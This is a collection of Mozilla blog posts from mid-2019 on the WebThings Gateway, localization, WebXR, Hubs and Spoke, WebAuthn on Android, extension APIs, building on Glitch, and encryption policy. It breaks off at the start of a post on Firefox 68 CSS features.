The 0.9 WebThings Gateway release added support for notifiers as a specific form of add-on. Thanks to the efforts of the community and a bit of our own work, your gateway can already send you notifications over email, SMS, Telegram, or specialized push notification apps with new add-ons released every week. You can find several notification add-on options by clicking “+” on the Settings > Add-ons page.

Main menu with settings highlighted Settings page with add-ons section highlighted Initial list of installed add-ons without email add-on List of installable add-ons with email sender highlighted List of installed add-ons with link to README of email add-on highlighted

The easiest-to-use notifiers are email and SMS since there are fewer moving parts, but feel free to choose whichever approach you prefer. Follow the configuration instructions in your chosen notifier’s README file. You can get to the README for your notifier by clicking on the author’s name in the add-on list then scrolling down.

You’ll find a complete guide to the email notifier here: https://github.com/mozilla-iot/email-sender-adapter#email-sender-adapter.

Creating a rule

Finally, let’s teach our gateway how and when it should yell for attention. We can set this up in a simple drag-and-drop rule. First, drag your device to the left as a trigger and select the “Leak” property.

Dragging and dropping the leak block into the rule Where to click to open the leak block's select property dropdown Configuring the leak block through a dropdown

Next, drag your notification channel to the right as an effect and configure its title, body, and level as desired.

Illustration of dragging email block into rule Rule after email block is dropped into it Configuring the email part of the rule through a dropdown

Your rule is now set up and ready to go!

Fully configured if leak then send email rule

The finished rule!

You can now manually test it out. For a leak sensor you can just spill a little water on it to make sure you get a text, email, or other notification warning you about a possible scary flood. This is also a perfect time to start experimenting. Can you set up a second, louder notification for when you’re asleep? What about only notifying when you’re at home so you can deal with the leak immediately?

Advanced rule logic where if the leak sensor is active and "phone at home" is true then it sends an email

A more advanced rule

Notifications are just one small piece of the WebThings Gateway ecosystem. We’re trying to build a future where the convenience of a connected life doesn’t require giving up your security and privacy. If you have ideas about how the WebThings Gateway can better orchestrate your home, please comment on Discourse or contribute on GitHub. If your preferred notification channel is missing and you can code, we love community add-ons! Check out the source code of the email add-on for inspiration. Coming up next, we’ll be talking about how you can have a natural spoken dialogue with the WebThings Gateway without sending your voice data to the cloud.

The post Using WebThings Gateway notifications as a warning system for your home appeared first on Mozilla Hacks - the Web developer blog.

Mozilla L10NL10n Report: August Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 


New localizers:

  • Mohsin of Assamese (as) is committed to rebuilding the community and has been contributing to several projects.
  • Emil of Syriac (syc) joined us through the Common Voice project.
  • Ratko and Isidora of Serbian (sr) have been prolific contributors to a wide range of products and projects since joining the community.
  • Haile of Amharic (am) joined us through the Common Voice project, and is busy localizing and recruiting more contributors so he can rebuild the community.
  • Ahsun Mahmud of Bengali (bn) focuses his interest on Firefox.

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

  • Maltese (mt)
  • Romansh Vallader (rm-vallery)
  • Syriac (syc)

New content and projects

What’s new or coming up in Firefox desktop

We’re quickly approaching the deadline for Firefox 69. The last day to ship your changes in this version is August 20, less than a week away.

A lot of content targeting Firefox 70 has already landed and is available in Pontoon for translation, with more to come in the following days. Here are a few of the areas you should focus your testing on.


This is the new password manager for Firefox. If you don’t plan to store the passwords in your browser, you should at least create a new profile to test the feature and its interactions (adding logins, editing, removing, etc.).

Enhanced Tracking Protection (ETP) and Protection Panels

This is going to be the main focus for Firefox 70:

  • New protection panel displayed when clicking the shield icon in the address bar.
  • Updated preferences.
  • New about:protections page. The content of this page will be exposed for localization in the coming days.

With ETP there will be several new terms to define for your language, like “Cross-Site Tracking Cookies” or “Social Media Trackers”. Make sure they’re translated consistently across the products and websites.

The deadline to ship localization for Firefox 70 will be October 8.

What’s new or coming up in mobile

It’s summer vacation time in mobile land, which means most projects are following the usual course of things.

Just like for Desktop, we’re quickly approaching the deadline for Firefox Android v69. The last day to ship your changes in this version is August 20.

Another thing to note is that we’ve exposed strings for Firefox iOS v19 (deadline TBD soon).

Other projects are following the usual continuous localization workflow. Stay tuned for the next report as there will be novelties then for sure!

What’s new or coming up in web projects

Firefox Accounts

A lot of strings landed earlier this month. If you need to prioritize what to localize first, look for string IDs containing `delete_account` or `sync-engines`. Expect more strings to land in the coming weeks.


The following files were added or updated since the last report.

  • New: firefox/adblocker.lang and firefox/whatsnew_69.lang (due on August 26)
  • Update: firefox/new/trailhead.lang

The navigation.lang file has been available for localization for some time. This is a shared file, and its content is on production whether the file is fully localized or not. If it is not fully translated, give this file higher priority so it is completed soon.

What’s new or coming up in Foundation projects

More content from foundation.mozilla.org will be exposed to localization in de, es, fr, pl, pt-BR over the next few weeks! Content is exposed in different stages, because the website is built using different technologies, which makes it challenging for localization. The main pages will be available in the Engagement project, and a new tag can help you find them. Other template strings will be exposed in a new project later.

donate.mozilla.org is getting an update too! The website is being rebuilt from the ground up with a new system that will make it easier to maintain. The UI won’t change too much, so the copy will mostly remain the same. However, it won’t be possible to migrate the current translations to the new system; instead, we will rely heavily on Pontoon’s translation memory.
Once the new website is ready, the current project in Pontoon will be set to “read only” mode during a transition period and a new project will be enabled.

Please make sure to review any pending suggestions over the next few weeks, so that they get properly added to the translation memory and are ready to be reused in the new project.

What’s new or coming up in SuMo

Newly published articles:

What’s new or coming up in Pontoon

The Translate.Next work moves on. We hope to have it wrapped up by the end of this quarter (i.e., end of September). Help us test by turning on Translate.Next from the Pontoon translation editor.

Newly published localizer facing documentation


  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers, and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Mozilla VR BlogWebXR category in JS13KGames!


Today starts the 8th edition of the annual js13kGames competition and we are sponsoring its WebXR category with a bunch of prizes including Oculus Quest headsets!

Like many other game development contests, the main goal of the js13kGames competition is to make a game based on a given theme under a specific amount of time. This year’s theme is "BACK" and the time you have to work on your game is a whole month, from today to September 13th.
There is, of course, another important rule you must follow: the zip containing your game should not weigh more than 13kb. (Please follow this link for the complete set of rules). Don’t let the size restriction discourage you. Previous competitors have done amazing things in 13kb.

This year, as in the previous editions, Mozilla is sponsoring the competition, with special emphasis on the WebXR category, where, among other prizes, the best three games will get an Oculus Quest headset!


Frameworks allowed

Last year you were allowed to use A-Frame and Babylon.js in your game. This year we have been working with the organization to include three.js on that list!
Because these frameworks weigh far more than 13kb, the requirements for this category have been relaxed: the size of the framework builds won’t count toward the final 13kb limit. The allowed links for each framework to include in your game are the following:


If you feel you can present a WebXR game without using any third-party framework and still keep the 13kb limit for the whole game, you are free to do so and I’m sure the judges will value that fact.

You may use any kind of input system: gamepad, gazer, 3dof or 6dof controllers, and we will still be able to test your game on different VR devices. Please indicate in the description what the device/input requirements are for your game.
If you have a standalone headset, please make sure you try your game on Firefox Reality because we plan to feature the best games of the competition on the Firefox Reality homepage.


Here are some useful links if you need some help or want to share your progress!

Enjoy and good luck!

Mozilla VR BlogCustom elements for the immersive web


We are happy to introduce the first set of custom elements for the immersive web we have been working on: <img-360> and <video-360>.

From the Mixed Reality team, we keep working on improving the content creator experience: building new frameworks, tools, and APIs, tuning performance, and so on.
Most of these projects are based on the assumption that users have a basic knowledge of 3D graphics and want to go deep into fully customizing their WebXR experience (e.g., using A-Frame or three.js).
But there are still a lot of use cases where content creators just want very simple interactions and don’t have the knowledge or time to create and maintain a custom application built on top of a WebXR framework.

With this project we aim to address the problems these content creators have by providing custom elements with simple, yet polished features. One could be just a simple 360 image or video viewer, another one could be a tour allowing the user to jump from one image to another.


Custom elements provide a standard way to create HTML elements that offer simple functionality and match the expectations of content creators without knowledge of 3D, WebXR, or even JavaScript.

How does this work?

Just include the JavaScript bundle on your page and you can start using both elements in your HTML: <img-360> and <video-360>. You just need to provide them with a 360 image or video, and the custom elements will do the rest, including detecting WebVR support. Here is a simple example that adds a 360 image and video to a page. All of the interaction controls are generated automatically:
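The snippet itself didn’t survive extraction here; usage looks roughly like the following sketch, where the bundle filename and the `src` attribute name are assumptions (check the project’s GitHub README for the exact details):

```html
<!-- Hypothetical usage sketch: the bundle filename and attribute names are
     assumptions; see the project's GitHub README for the exact ones. -->
<script src="custom-elements-bundle.js"></script>

<img-360 src="my-360-photo.jpg"></img-360>
<video-360 src="my-360-video.mp4"></video-360>
```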

You can try a demo here and find detailed information on how to use them on GitHub.

Next steps

Today we are releasing just these two elements but we have many others in mind and would love your feedback. What new elements would you find useful? Please join us on GitHub to discuss them.
We are also excited to see other companies working hard on providing quality custom elements for the 3D and XR web, such as Google with their <model-viewer> component, and we hope others will follow.

Mozilla VR BlogA Summer with Particles and Emojis


This summer I was very lucky to join Hubs by Mozilla as a technical artist intern. Over the 12 weeks I was at Mozilla, I worked on two different projects.
My first project was about particle systems, something I have always had a great interest in: I developed the particle system feature for Spoke, the 3D editor that lets you easily create a 3D scene and publish it to Hubs.

Particle systems are a technique used in a wide range of game physics, motion graphics, and computer graphics fields. They are usually composed of a large number of small sprites or other objects that simulate some chaotic system or natural phenomenon. Particles can make a huge impact on the visual result of an application, and in virtual and augmented reality they can greatly deepen the feeling of immersion.

Particle systems can be incredibly complex, so for this version we wanted to avoid the heavy behaviour controls found in native game engines’ particle systems, keeping only the basic attributes that are needed. The Spoke particle system can be separated into two parts: the particles and the emitter. Each particle has a texture/sprite, lifetime, age, size, color, and velocity as its basic attributes. The emitter is simpler, as it only has properties for its width and height and information about the particle count (how many particles it can emit per life cycle).

By changing the particle count and the emitter size, users can easily customize a particle system for different uses, like to create falling snow in a wintry scene or add a small water splash to a fountain.
Changing the emitter size

Changing the number of particles from 100 to 200

You can also change the opacities and the colors of the particles. The actual color and opacity values are interpolated between start, middle and end colors/opacities.
A Summer with Particles and Emojis

And for the main visuals, we can change the sprites to the image we want by using a URL to an image, or choosing from your local assets.
A Summer with Particles and Emojis

What does a particle’s life cycle look like? Let’s take a look at this chart:
A Summer with Particles and Emojis
Every particle is born with a random negative initial age, which can be adjusted through the Age Randomness property. After it's born, its age keeps growing as time goes by. When its age exceeds the total lifetime (formed by Lifetime and Lifetime Randomness), the particle dies immediately, is re-assigned a negative initial age, and starts over again. The Lifetime here is not the actual lifetime that every particle lives: in order not to have all particles disappear at the same time, the Lifetime Randomness attribute varies the actual lifetime of each particle. The higher the Lifetime Randomness, the larger the variation among the actual lifetimes of the whole particle system. Age Randomness is similar, but works on the other end: it varies the negative initial ages to create variation at the birth of the particles, while Lifetime Randomness creates variation at the end of their lives.
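The life cycle described above is easy to express in code. The sketch below is purely illustrative (the function names are ours, not Spoke's actual implementation):

```javascript
// Illustrative sketch of the particle life cycle described above;
// not Spoke's actual implementation.
function makeParticle(lifetime, lifetimeRandomness, ageRandomness) {
  return {
    // Born with a random negative initial age (Age Randomness).
    age: -Math.random() * ageRandomness,
    // The actual lifetime varies per particle (Lifetime Randomness).
    lifetime: lifetime + Math.random() * lifetimeRandomness,
  };
}

function updateParticle(p, dt, lifetime, lifetimeRandomness, ageRandomness) {
  p.age += dt; // age keeps growing as time goes by
  if (p.age > p.lifetime) {
    // The particle dies, is re-assigned a negative initial age,
    // and starts over again.
    const reborn = makeParticle(lifetime, lifetimeRandomness, ageRandomness);
    p.age = reborn.age;
    p.lifetime = reborn.lifetime;
  }
  return p;
}
```

Because each particle draws its own random offsets, particles born together still die at different times, which is exactly what the two randomness attributes are for.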

Every particle also has velocity properties across the x, y and z axes. By adjusting the velocity in three dimensions, users have better control over the particles' behaviours, for example to simulate simple phenomena like gravity or wind.
A Summer with Particles and Emojis
With angular velocity, you can also control the rotation of the particle system for a more natural and dynamic result.
A Summer with Particles and Emojis

The velocity, color and size properties all have the option to use different interpolation functions between their start, middle and end stages.
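As a concrete illustration, here is how a single scalar attribute (opacity, say) can be interpolated across the start, middle and end stages. Plain linear easing is assumed, and the function names are ours:

```javascript
// Sketch: interpolate a scalar attribute over a particle's normalized
// age t in [0, 1], passing through start, middle and end values.
// Linear easing is assumed; Spoke lets you pick other functions.
function lerp(a, b, t) {
  return a + (b - a) * t;
}

function interpolateOverLife(start, middle, end, t) {
  return t < 0.5
    ? lerp(start, middle, t * 2)        // first half: start -> middle
    : lerp(middle, end, (t - 0.5) * 2); // second half: middle -> end
}
```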

A Summer with Particles and Emojis
The particle system is officially out on Spoke, so go try it out and let us know what you think!
A Summer with Particles and Emojis

Avatar Display Emojis

My other project was the avatar emoji display screen in Hubs. I did the design of the emoji images, the UI/UX design, and the actual implementation of the feature. It was a fairly straightforward project: I needed to figure out the style of the emoji display on the chest screen, do some graphic design at the interface level, make decisions on the interaction flow, and implement it in Hubs.

A Summer with Particles and Emojis
Evolution of the display emoji design.

We ultimately decided to have the smooth edge emoji with some bloom effect.
A Summer with Particles and Emojis
Final version of the display emoji design

A Summer with Particles and Emojis
Icon design for the menu user interface

A Summer with Particles and Emojis
Interaction design using Hubs display styles

A Summer with Particles and Emojis

When you enter pause mode on Hubs, the emoji box will show up, replacing the chat box, and you can change your avatar’s screen to one of the emojis offered.

I want to say thank you to Hubs for having me this summer. I learned a lot from all the talented people in Hubs, especially Robert, Jim, Brian and Greg who helped me a lot to overcome the difficulties I came across. The encouragement and support from the team is the best thing I got this summer. Miss you guys already!
A Summer with Particles and Emojis

SUMO BlogCommunity Management Update

Hello SUMO community,

I have a couple announcements for today. I’d like you all to welcome our two new community managers.

First off, Kiki has officially joined the SUMO team as a community manager. Kiki has been filling in with Konstantina and Ruben on our social support activities. We had an opportunity to bring her onto the SUMO team full time starting last week. She will be transitioning out of her responsibilities at the Community Development Team and will continue her work on the social program, as well as managing SUMO days going forward.

In addition, we have hired a new SUMO community manager to join the team. Please welcome Giulia Guizzardi to the SUMO team.

You can find her on the forums as gguizzardi. Below is a short introduction:

Hey everyone, my name is Giulia Guizzardi, and I will be working as a Support Community Manager for Mozilla. 

I am currently based in Berlin, but I was born and raised in the north-east of Italy. I studied Digital Communication in Italy and Finland, and worked for half a year in Poland.

My greatest passion is music: I love participating in festivals and concerts, along with collecting records and listening to new releases all day long. Other than that, I am often online, playing video games (Firewatch at the moment) or scrolling YouTube/Reddit.

I am really excited for this opportunity and happy to work alongside the community!

Now that we have two new community managers we will work with Konstantina and Ruben to transition their work to Kiki and Giulia. We’re also kicking off work to create a community strategy which we will be seeking feedback for soon. In the meantime, please help me welcome Kiki and Giulia to the team.

SeaMonkeyBuild numero deux


After a long delay, I’ve uploaded build 2 of 2.49.5.

Checksums are there.

Next to be done will be build #3.


Web Application SecurityWeb Authentication in Firefox for Android

Firefox for Android (Fennec) now supports the Web Authentication API as of version 68. WebAuthn blends public-key cryptography into web application logins, and is our best technical response to credential phishing. Applications leveraging WebAuthn gain new second factor and “passwordless” biometric authentication capabilities. Now, Firefox for Android matches our support for Passwordless Logins using Windows Hello. As a result, even while mobile you can still obtain the highest level of anti-phishing account security.

Firefox for Android uses your device’s native capabilities: On certain devices, you can use built-in biometrics scanners for authentication. You can also use security keys that support Bluetooth, NFC, or can be plugged into the phone’s USB port.

The attached video shows the usage of Web Authentication with a built-in fingerprint scanner: The demo website enrolls a new security key in the account using the fingerprint, and then subsequently logs in using that fingerprint (and without requiring a password).
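For the curious, the enrollment step in that demo goes through the standard navigator.credentials.create() call. The sketch below shows the shape of the request; the relying-party values and the buildRegistrationOptions helper are hypothetical, and a real site must generate the challenge server-side:

```javascript
// Sketch of a WebAuthn enrollment call. The relying-party values and
// the buildRegistrationOptions helper are hypothetical; a real
// challenge must come from your server, never the client.
function buildRegistrationOptions(challenge, userId) {
  return {
    challenge,                              // Uint8Array from the server
    rp: { name: "Example Site" },
    user: { id: userId, name: "alice", displayName: "Alice" },
    pubKeyCredParams: [{ type: "public-key", alg: -7 }], // -7 = ES256
    authenticatorSelection: { userVerification: "preferred" },
    timeout: 60000,
  };
}

// In the browser, this prompts for the fingerprint or security key:
if (typeof navigator !== "undefined" && navigator.credentials) {
  navigator.credentials
    .create({ publicKey: buildRegistrationOptions(new Uint8Array(32), new Uint8Array(16)) })
    .then((cred) => console.log("new credential id:", cred.id));
}
```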

Adoption of Web Authentication by major websites is underway: Google, Microsoft, and Dropbox all support WebAuthn via their respective Account Security Settings’ “2-Step Verification” menu.

A few notes

For technical reasons, Firefox for Android does not support the older, backwards-compatible FIDO U2F JavaScript API, which we enabled on Desktop earlier in 2019. For details as to why, see bug 1550625.

Currently Firefox Preview for Android does not support Web Authentication. As Preview matures, Web Authentication will be joining its feature set.


The post Web Authentication in Firefox for Android appeared first on Mozilla Security Blog.

Mozilla Add-ons BlogExtensions in Firefox 69

In our last post, for Firefox 68, we introduced a great number of new features. In contrast, Firefox 69 only has a few new additions. Still, we are proud to present this round of changes to extensions in Firefox.

Better Topsites

The topSites API has received a few additions to better allow developers to retrieve the top sites as Firefox knows them. There are no changes to the defaults, but we’ve added a few options for better querying. The browser.topSites.get() function has two additional options that can be specified to control what sites are returned:

  • includePinned can be set to true to include sites that the user has pinned on the Firefox new tab.
  • includeSearchShortcuts can be set to true to include search shortcuts.

Passing both options allows you to mimic the behavior you see on the new tab page, where both pinned results and search shortcuts are available.
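For example, a background script that mirrors the new tab page's list might look like this (the describeSites helper is our own; browser only exists inside an extension with the "topSites" permission):

```javascript
// WebExtension background-script sketch: query top sites the way the
// new tab page sees them. Requires the "topSites" permission.
const options = { includePinned: true, includeSearchShortcuts: true };

// Hypothetical helper to format the results for logging.
function describeSites(sites) {
  return sites.map((site) => `${site.title} -> ${site.url}`);
}

if (typeof browser !== "undefined") {
  browser.topSites.get(options).then((sites) => {
    console.log(describeSites(sites).join("\n"));
  });
}
```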

User Scripts

This is technically an addition to Firefox 68, but since we didn’t mention it in the last blog post, it gets an honorable mention here. In March, we announced that user scripts were coming, and now they are here. Starting with Firefox 68, you will be able to use the userScripts API without needing to set any preferences in about:config.

The great advantage of the userScripts API is that it can run scripts with reduced privileges. Your extension can provide a mechanism to run user-provided scripts with a custom API, avoiding the need to use eval in content scripts. This makes it easier to adhere to the security and privacy standards of our add-on policies. Please see the original post on this feature for an example on how to use the API while we update the documentation.
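A minimal registration might look like the sketch below. The match pattern and script body are placeholders, the buildUserScriptOptions helper is ours, and the extension's manifest must declare a user_scripts key for the API to be available:

```javascript
// Sketch: register a user-provided script with reduced privileges.
// The match pattern and script body are placeholder examples, and the
// manifest must include a "user_scripts" key.
function buildUserScriptOptions(userCode) {
  return {
    matches: ["*://example.com/*"],
    js: [{ code: userCode }],
    runAt: "document_idle",
  };
}

if (typeof browser !== "undefined") {
  browser.userScripts
    .register(buildUserScriptOptions('console.log("hello from a user script");'))
    .then((registered) => {
      // registered.unregister() would remove the script again.
    });
}
```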


  • The downloads API now correctly supports byExtensionId and byExtensionName for extension-initiated downloads.
  • Clearing site permissions no longer re-prompts the user to accept storage permissions after a restart.
  • Using alert() in a background page will no longer block the extension from running.
  • The proxy.onRequest API now also supports FTP and WebSocket requests.

A round of applause goes to our volunteer contributors Martin Matous, Michael Krasnov, Myeongjun Go, Joe Jalbert, as well as everyone else who has made these additions in Firefox 69 possible.

The post Extensions in Firefox 69 appeared first on Mozilla Add-ons Blog.

Mozilla VR BlogLessons from Hacking Glitch

Lessons from Hacking Glitch

When we first started building MrEd we imagined it would be done as a traditional web service. A potential user goes to a website, creates an account, then can build experiences on the site and save them to the server. We’ve all written software like this before and had a good idea of the requirements. However, as we started actually building MrEd we realized there were additional challenges.

First, MrEd is targeted at students, many of them young. My experience with teaching kids during previous summers let me know that they often don’t have email addresses, and even if they do there are privacy and legal issues around tracking what the students do. Also, we knew that this was an experiment which would end one day, but we didn’t want the students to lose access to this tool they had just learned.

After pondering these problems, we thought Glitch might be an answer. It supports anonymous use out of the box and allows easy remixing. It also has a nice CDN built in, great for hosting models and 360 images. If we could host the editor as well as the documents, then Glitch would be the perfect platform for a self-contained tool that lives on after the experiment was done.

The downside of Glitch is that many of its advanced features are undocumented. After much research we figured out how to modify Glitch to solve many problems, so now we’d like to share our solutions with you.

Making a Glitch from a Git Repo

Glitch’s editor is great for editing a small project, but not for building large software. We knew from the start that we’d need to edit on our local machines and store the code in a GitHub repo. The question was how to get that code initially into Glitch? It turns out Glitch supports creating a new project from an existing git repo. This was a fantastic advantage.

Lessons from Hacking Glitch

We could now create a build of the editor and set up the project just how we like, keep it versioned in Git, then make a new Glitch whenever we needed to. We built a new repo called mred-base-glitch specifically for this purpose and documented the steps to use it in the readme.

Integrating React

MrEd is built in React, so the next challenge was how to get a React app into Glitch. During development we ran the app locally using a hot-reloading dev server. For final production, however, we needed static files that could be hosted anywhere. Since our app was made with create-react-app we can build a static version with npm run build. The problem is that it requires you to set the homepage property in your package.json to calculate the final URL references. This wouldn’t work for us because someone’s Glitch could be renamed to anything. The solution was to set homepage to ., so that all URLs are relative.
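In create-react-app, the field in question is homepage, and setting it to "." makes the build emit relative URLs. A minimal, illustrative package.json fragment looks like:

```json
{
  "name": "mred",
  "homepage": ".",
  "scripts": {
    "build": "react-scripts build"
  }
}
```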

Next we wanted the editor to be hidden. In Glitch the user has a file list on the left side of the editor. While it’s fine to have assets and scripts be visible, we wanted the generated React code to be hidden. It turns out Glitch will hide any directory if it begins with a dot (.). So in our base repo we put the code into public/.mred.

Finally we had the challenge of how to update the editor in an existing glitch without overwriting assets and documents the user had created.

Rather than putting everything into one git repo we made two. The first repo, mred, contains just the code to build the editor in React. The second repo, mred-base-glitch, contains the default documents and behaviors. This second repo integrates the first one as a git submodule. The compiled version of the editor also lives in the mred repo in the build directory. This way both the source and compiled versions of the editor can be versioned in git.

Whenever you want to update the editor in an existing glitch you can go to the Glitch console and run git submodule init and git submodule update to pull in just the editor changes. Then you can update the glitch UI with refresh. While this was a manual step, the students were able to do it easily with instruction.

Loading documents

The editor is a static React app hosted in the user’s Glitch, but it needs to save documents created in the editor at some location. Glitch doesn’t provide an API for programmatically loading and saving documents, but any Glitch can have a NodeJS server in it so we built a simple document server with express. The doc server scans the documents and scripts directories to produce a JSON API that the editor consumes.

For the launch page we wanted the user to see a list of their current projects before opening the editor. For this part the doc server has a route at / which returns a webpage containing the list as links. For URLs that need to be absolute the server uses a magic variable provided by Glitch to determine the hostname: process.env.PROJECT_DOMAIN.

The assets were a bit trickier than scripts and docs. The editor needs a list of available assets, but we can’t just scan the assets directory because assets aren’t actually stored in your Glitch. Instead they live on Glitch’s CDN using long generated URLs. However, the Glitch does have a hidden file called .glitch-assets which lists all of the assets as a JSON doc, including the mime types.

We discovered that a few of the files students wanted to use, like GLBs and WAVs, aren’t recognized by Glitch. You can still upload these files to the CDN but the .glitch-assets file won’t list the correct mime-type, so our little doc server also calculated new mime types for these files.
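Our workaround looked roughly like this. We're assuming the newline-delimited JSON layout and field names (name, type) we observed in .glitch-assets, which are undocumented and may change:

```javascript
// Sketch: read the hidden .glitch-assets file (newline-delimited JSON)
// and patch mime types Glitch doesn't recognize, like GLB and WAV.
// Field names (name, type) reflect what we observed and may change.
const EXTRA_TYPES = {
  ".glb": "model/gltf-binary",
  ".wav": "audio/wav",
};

function parseAssets(text) {
  return text
    .split("\n")
    .filter((line) => line.trim().length > 0)
    .map((line) => JSON.parse(line))
    .map((asset) => {
      const ext = (asset.name.match(/\.[^.]+$/) || [""])[0].toLowerCase();
      if (EXTRA_TYPES[ext]) asset.type = EXTRA_TYPES[ext];
      return asset;
    });
}
```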

Having a tiny document server in the Glitch gave us a lot of flexibility to fix bugs and implement missing features. It was definitely a design win.

User Authentication

Another challenge with using Glitch is user authentication. Glitch has a concept of users and will not let a user edit someone else’s glitch without permission, but this user system is not exposed as an API. Our code had no way to know if the person interacting with the editor is the owner of that glitch or not. There are rumors of such a feature in the future, but for now we made do with a password file.

It turns out glitches can have a special file called .env for storing passwords and other secure environment variables. This file can be read by code running in the glitch, but it is not copied when remixing, so if someone remixes your glitch they won’t find out your password. To use this we require students to set a password as soon as they remix the base glitch. Then the doc server uses the password to authenticate communication with the editor.
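The check itself can be very small. In this sketch the PASSWORD variable name and the x-password header are our own choices, not a Glitch convention:

```javascript
// Sketch of the doc server's auth check against the .env password.
// PASSWORD and the x-password header name are illustrative choices.
function isAuthorized(req, expected) {
  if (!expected) return false; // no password set yet: deny edits
  return req.headers["x-password"] === expected;
}

// An express route would then gate writes with something like:
//   if (!isAuthorized(req, process.env.PASSWORD)) return res.sendStatus(401);
```

A production service should use a constant-time comparison, but for a classroom experiment a plain equality check was enough.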

Future Features

We managed to really modify Glitch to support our needs and it worked quite well. That said, there are a few features we’d like them to add in the future.

Documentation. Almost everything we did above came after lots of research in the support forums, and help from a few Glitch staffers. There is very little official documentation on how to do anything beyond basic project development. It would be nice if there was an official docs site beyond the FAQs.

A real authentication API. Using the .env file was a nice hack, but it would be nice if the editor itself could respond properly to the user. If the user isn’t logged in it could show a play only view of the experience. If the user is logged in but isn’t the owner of the glitch then it could show a remix button.

A way to populate assets programmatically. Everything you see in a glitch when you clone from GitHub comes from the underlying git repo except for the assets. To create a glitch with a pre-set list of assets (say for doing specific exercises in a class) requires manually uploading the files through the visual interface. There is no way (at least that we could find) to store the assets in the git repo or upload them programmatically.

Overall Glitch worked very well. We got an entire visual editor, assets, and document storage into a single conceptual chunk -- a glitch -- that can be shared and remixed by anyone. We couldn’t have done what we needed on such a short timeline without Glitch. We thank you Glitch Team!

Mozilla VR BlogHubs July Update

Hubs July Update

We’ve introduced new features that make it easier to moderate and share your Hubs experience. July was a busy month for the team, and we’re excited to share some updates! As the community around Hubs has grown, we’ve had the chance to see different ways that groups meet in Hubs and are excited to explore new ways that groups can choose what types of experience they want to have. Different communities have different needs for how they’re meeting in Hubs, and we think that these features are a step towards helping people get co-present together in virtual spaces in the way that works best for them.

Room-Level Permissions
It is now possible for room owners to specify which features are granted to other users in the room. This allows the owner of the room to decide if people can add media to the room, draw with the pen, pin objects, and create cameras. If you’re using Hubs for a meeting or event where there will be a larger number of attendees, this can help keep the room organized and free from distractions.

Hubs July Update

Promoting Moderators
For groups that hold larger events in Hubs, there is now the ability to promote other users in a Hubs room to also have the capabilities of the room owner. If you’ve been creating rooms using the Hubs Discord bot, you may already be familiar with rooms that have multiple owners. This feature can be especially valuable for groups that have a core set of administrators who are available in the room to help moderate and keep events running smoothly. Room owners can promote other users to moderators by opening up the user list and selecting the user from a list, then clicking ‘Promote’ on the action list. You should only promote trusted users to moderator, since they’ll have the same permissions as you do as the room owner. Users must be signed in to be promoted.

Camera Mode
Room owners can now hide the Hubs user interface by enabling camera mode, which was designed for groups that want to have a member in the room record or livestream their gathering. When in camera mode, the room owner will broadcast the view from their avatar and replace the Lobby camera, and non-essential UI elements will be hidden. The full UI can be hidden by clicking the ‘Hide All’ button, which allows for a clear, unobstructed view of what’s going on in the room.

Video Recording
The camera tool in Hubs can now be used to record videos as well as photos. When a camera is created in the room, you can toggle different recording options that can be used by using the UI on the camera itself. Like photos, videos that are taken with the in-room camera will be added to the room after they have finished capturing. Audio for videos will be recorded from the position of the avatar of the user who is recording. While recording video on a camera, users will have an indicator on their display name above their head to show that they are capturing video. The camera itself also contains a light to indicate when it is recording.

Hubs July Update

Tweet from Hubs
For users who want to share their photos, videos, and rooms through Twitter, you can now tweet from directly inside of Hubs when media is captured in a room. When you hover over a photo or video that was taken by the in-room camera, you will see a blue ‘Tweet’ button appear. The first time you share an image or video through Twitter, you will be prompted to authenticate to your Twitter account. You can review the Hubs Privacy Policy and third-party notices here, and revoke access to Hubs from your Twitter account by going to https://twitter.com/settings/applications.

Embed Hubs Rooms
You can now embed a Hubs room directly into another web page in an iFrame. When you click the 'Share' button in a Hubs room, you can copy the embed code and paste it into the HTML on another site. Keep in mind that this means anyone who visits that page will be able to join!

Hubs July Update

Discord Bot Notifications
If you have the Hubs Discord bot in your server and bridged to a channel, you can now set a reminder to notify you of a future event or meeting. Just type in the command !hubs notify set mm/dd/yyyy and your time zone, and the Hubs Bot will post a reminder when the time comes around.

Microphone Level Indicator
Have you ever found yourself wondering if other people in the room could hear you, or forgotten that you were muted? The microphone icon in the HUD now shows mic activity level, regardless of whether or not you have your mic muted. This is a handy little way to make sure that your microphone is picking up your audio, and a nice reminder that you’re talking while muted.

In the coming months, we will be continuing work on new features aimed at enabling communities to get together easily and effectively. We’ll also be exploring improvements to the avatar customization flow and new features for Spoke to improve the tools available to creators to build their own spaces for their Hubs rooms. To participate in the conversation about new features and join our weekly community meetups, join us on Discord using the invitation link here.

Open Policy & AdvocacyMozilla calls for transparency in compelled access case

Sometime last year, Facebook challenged a law enforcement request for access to encrypted communications through Facebook Messenger, and a federal judge denied the government’s demand. At least, that is what has been reported by the press. Troublingly, the details of this case are still not available to the public, as the opinion was issued “under seal.” We are trying to change that.

Mozilla, with Atlassian, has filed a friend of the court brief in a Ninth Circuit appeal arguing for unsealing portions of the opinion that don’t reveal sensitive or proprietary information or, alternatively, for releasing a summary of the court’s legal analysis. Our common law legal system is built on precedent, which depends on the public availability of court opinions for potential litigants and defendants to understand the direction of the law. This opinion would have been only the third since 2003 offering substantive precedent on compelled access—thus especially relevant input on an especially serious issue.

This case may have important implications for the current debate about whether and under what circumstances law enforcement can access encrypted data and encrypted communications. The opinion, if disclosed, could help all kinds of tech companies push back on overreaching law enforcement demands. We are deeply committed to building secure products and establishing transparency and control for our users, and this information is vital to enabling those ends. As thoughtful, mission-driven engineers and product designers, it’s critical for us as well as end users to understand the legal landscape around what the government can and cannot require.

The post Mozilla calls for transparency in compelled access case appeared first on Open Policy & Advocacy.

hacks.mozilla.orgNew CSS Features in Firefox 68

Firefox 68 landed earlier this month with a bunch of CSS additions and changes. In this blog post we will take a look at some of the things you can expect to find, that might have been missed in earlier announcements.

CSS Scroll Snapping

The headline CSS feature this time round is CSS Scroll Snapping. I won’t spend much time on it here as you can read the blog post for more details. The update in Firefox 68 brings the Firefox implementation in line with Scroll Snap as implemented in Chrome and Safari. In addition, it removes the old properties which were part of the earlier Scroll Snap Points Specification.

The ::marker pseudo-element

